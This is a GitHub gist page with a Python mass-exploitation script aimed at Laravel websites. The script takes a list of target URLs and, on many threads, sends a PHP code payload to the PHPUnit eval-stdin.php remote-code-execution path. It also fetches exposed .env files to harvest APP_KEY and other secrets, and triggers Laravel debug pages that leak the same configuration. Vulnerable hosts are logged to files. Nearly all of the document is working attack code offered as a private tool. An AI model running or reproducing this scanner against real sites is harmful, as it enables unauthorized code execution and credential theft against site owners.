-
-
Save kingsalman99/4d26fe316ffd59fe0b0d1f116cd556ab to your computer and use it in GitHub Desktop.
Bot Automation detect debug mode laravel & PHP UNIT Exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # ====================================================== | |
| # Change the author name don't make you become a coder | |
| # contact : galehrizky@xaisyndicate.id | |
| # Priv8 tools | |
| # requirement : python3 | |
| # use : python3 laravel.py | |
| # @2020 galehdotid | fb.com/hax0rtersakiti | |
| # ======================================================= | |
| import requests,time,os,sys,re | |
| from termcolor import colored | |
| from requests.packages.urllib3.exceptions import InsecureRequestWarning | |
| from concurrent.futures import ThreadPoolExecutor | |
| requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | |
| class warna(): | |
| """docstring for warna""" | |
| def red(self,str): | |
| return colored(str, "red") | |
| def blue(self,str): | |
| return colored(str, "blue") | |
| def green(self,str): | |
| return colored(str, "green") | |
| def yellow(self,str): | |
| return colored(str, "yellow") | |
| class _exploit(): | |
| """This Class For check the initial""" | |
| def __init__(self): | |
| self.clr = warna() | |
| def phpunit_detect(self,url): | |
| try: | |
| self.detectenv(url) | |
| with requests.Session() as session: | |
| session.headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36"} | |
| payload = "<?php echo 'galehdotids#'.php_uname().'#'; ?>" | |
| response = session.post(url+'/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php', data=payload,verify=False,timeout=5,allow_redirects=False) | |
| if 'galehdotids' in response.text: | |
| print(self.clr.green("[-] [PHPUNIT] [VULN] {}".format(url))) | |
| self.save(url, "phpunit.txt") | |
| else: | |
| self.save(url, "not_vuln.txt") | |
| print(self.clr.red("[-] [PHP UNIT NOT VULN] {}".format(url))) | |
| except Exception as e: | |
| pass | |
| def detectenv(self,url): | |
| try: | |
| with requests.Session() as session: | |
| session.headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36"} | |
| wew = session.get(url+'/.env',verify=False,timeout=5,allow_redirects=False) | |
| waw = session.get(url+'/vendor/.env',verify=False,timeout=5,allow_redirects=False) | |
| wuw = session.get(url+'/storage/.env',verify=False,timeout=5,allow_redirects=False) | |
| wwek = session.get(url+'/public/.env',verify=False,timeout=5,allow_redirects=False) | |
| if 'APP_KEY=' in wew.text: | |
| url_env = url+'/.env' | |
| print(self.clr.green("[-] [ENV] [/env] {}".format(url))) | |
| elif 'APP_KEY=' in waw.text: | |
| url_env = url+'/vendor/.env' | |
| print(self.clr.green("[-] [ENV] [/vendor/.env] {}".format(url))) | |
| elif 'APP_KEY=' in wuw.text: | |
| url_env = url+'/storage/.env' | |
| print(self.clr.green("[-] [ENV] [/storage/.env] {}".format(url))) | |
| elif 'APP_KEY=' in wwek.text: | |
| url_env = url+'/storage/.env' | |
| print(self.clr.green("[-] [ENV] [/public/.env] {}".format(url))) | |
| else: | |
| self.getdebug(url) | |
| print(self.clr.red("[-] [ENV] [NOT VALID] {}".format(url))) | |
| self.save(url_env, "env_laravel.txt") | |
| except Exception as e: | |
| pass | |
| def getdebug(self,url): | |
| try: | |
| with requests.Session() as session: | |
| session.headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36"} | |
| wew = session.post(url,data={"0x[1]":"awkoakweokawokM0ment"},verify=False,timeout=10,allow_redirects=False) | |
| if '<td>APP_KEY</td>' in wew.text: | |
| print(self.clr.green("[-] [LARAVEL DEBUG] [OK] {}".format(url))) | |
| self.save(url, "debug_laravel.txt") | |
| else: | |
| self.save(url, "not_vuln.txt") | |
| except Exception as e: | |
| pass | |
| def save(self, sites, names): | |
| s = open(names, "a+") | |
| s.write(sites+"\n") | |
| return s | |
| exploit = _exploit() | |
| def main(): | |
| try: | |
| print(''' ┏━┓━┏┓━━━━━━━━━━━━━━━━━━━━┏━━┓━━━━━━┏┓━ | |
| ┃┃┗┓┃┃━━━━━━━━━━━━━━━━━━━━┃┏┓┃━━━━━┏┛┗┓ | |
| ┃┏┓┗┛┃┏━━┓┏┓┏━━┓┏┓┏━┓━┏━━┓┃┗┛┗┓┏━━┓┗┓┏┛ | |
| ┃┃┗┓┃┃┃┏┓┃┣┫┃━━┫┣┫┃┏┓┓┃┏┓┃┃┏━┓┃┃┏┓┃━┃┃━ | |
| ┃┃━┃┃┃┃┗┛┃┃┃┣━━┃┃┃┃┃┃┃┃┗┛┃┃┗━┛┃┃┗┛┃━┃┗┓ | |
| ┗┛━┗━┛┗━┓┃┗┛┗━━┛┗┛┗┛┗┛┗━┓┃┗━━━┛┗━━┛━┗━┛ | |
| ━━━━━━┏━┛┃━━━━━━━━━━━━┏━┛┃━━━━━━━━━━━━━ | |
| ━━━━━━┗━━┛━━━━━━━━━━━━┗━━┛━━━━━━━━━━━━━ | |
| Galerzz x LaraTech v.1 Bajingan Berotak | |
| Still crack your brain ! | |
| ''') | |
| lisnya = input("Your name list -> ") | |
| trit = int(input("Put Your Thread Number -> ")) | |
| os.system('cls' if os.name == 'nt' else 'clear') | |
| try: | |
| with ThreadPoolExecutor(max_workers=trit) as executor: | |
| with open(lisnya, 'r') as url: | |
| for x in url: | |
| aw = x | |
| if not re.match('(?:http|ftp|https)://', x): | |
| aw = 'http://{}'.format(x) | |
| executor.submit(exploit.phpunit_detect,aw.rstrip()) | |
| except IOError as e: | |
| print("[-] YOUR LIST NOT FOUND !") | |
| sys.exit() | |
| pass | |
| except Exception as e: | |
| pass | |
| if __name__ == '__main__': | |
| try: | |
| main() | |
| except KeyboardInterrupt as e: | |
| print("[!] Exit Program....") | |
| sys.exit() | |
| pass |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment